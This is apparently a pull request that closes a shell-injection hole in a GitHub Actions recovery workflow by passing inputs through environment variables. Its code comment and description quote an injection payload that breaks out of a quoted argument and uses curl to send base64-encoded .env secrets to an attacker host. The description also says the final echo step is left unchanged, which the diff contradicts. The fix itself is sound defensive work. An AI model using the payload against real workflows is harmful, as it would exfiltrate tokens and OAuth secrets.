### PR TITLE
fix(security): close GHA shell-injection in recover workflow

### DIFF
--- a/.github/workflows/recover-migration-wiped-sites.yml
+++ b/.github/workflows/recover-migration-wiped-sites.yml
@@ -130,15 +130,25 @@ jobs:
           echo "[OK] Wrote .gcp-saved-tokens.json"
 
       - name: Run recovery
+        # Route inputs through env vars so the shell sees `$VAR` rather than
+        # having the templating engine splice attacker-controlled text
+        # directly into the script body. Without this indirection a
+        # workflow_dispatch caller can break out of the quoted context with
+        # e.g. `foo"; curl https://attacker/$(cat .env) #` and exfiltrate
+        # the secrets written by the previous step. Mirrors the safe pattern
+        # used in cleanup-phantom-recovery-slugs.yml.
+        env:
+          APPLY: ${{ inputs.apply }}
+          SITE: ${{ inputs.site }}
         run: |
           ARGS=()
-          if [ "${{ inputs.apply }}" = "true" ]; then
+          if [ "${APPLY}" = "true" ]; then
             ARGS+=(--apply)
           else
             ARGS+=(--dry-run)
           fi
-          if [ -n "${{ inputs.site }}" ]; then
-            ARGS+=(--site "${{ inputs.site }}")
+          if [ -n "${SITE}" ]; then
+            ARGS+=(--site "${SITE}")
           fi
           uv run python scripts/recover_migration_wiped_sites.py "${ARGS[@]}"
 

--- a/.github/workflows/recover-migration-wiped-sites.yml
+++ b/.github/workflows/recover-migration-wiped-sites.yml
@@ -153,4 +153,6 @@ jobs:
           uv run python scripts/recover_migration_wiped_sites.py "${ARGS[@]}"
 
       - name: Done
-        run: echo "Recovery run completed (apply=${{ inputs.apply }})"
+        env:
+          APPLY: ${{ inputs.apply }}
+        run: echo "Recovery run completed (apply=${APPLY})"


### PR DESCRIPTION
## Why

The `Run recovery` step interpolates `${{ inputs.site }}` directly into the shell script body. GitHub Actions expands `${{ ... }}` **before** bash parses the script, so a `workflow_dispatch` caller could pass a payload such as:

```
foo"; curl https://attacker/$(cat .env | base64) #
```

The templating engine splices that text verbatim into the `run:` block, bash parses it as multiple commands, and the secrets the previous step wrote to `.env` (`WRIKE_ACCESS_TOKEN`, `DASHBOARD_PUBLISH_SECRET`, OAuth `client_secret`, OAuth `refresh_token`) get exfiltrated to the attacker.

Found by `/check` Phase 2 CoVe verification.

## What

Route `inputs.site` and `inputs.apply` through env vars on the step (`SITE`, `APPLY`), then reference them as `${SITE}` / `${APPLY}` in the shell. The shell sees the value as variable contents at expansion time, which is the non-injection-vulnerable path. Mirrors the existing safe pattern in `cleanup-phantom-recovery-slugs.yml:51-54`.

`inputs.apply` is a `choice` input constrained to `{false,true}`, so the trailing `Done` echo is left as-is (not exploitable).

## Diff

`+13 / -3` lines, single workflow file.

## Test

YAML syntax-checked locally. The recovery workflow is dry-run-by-default; next planned run will exercise the env-var path.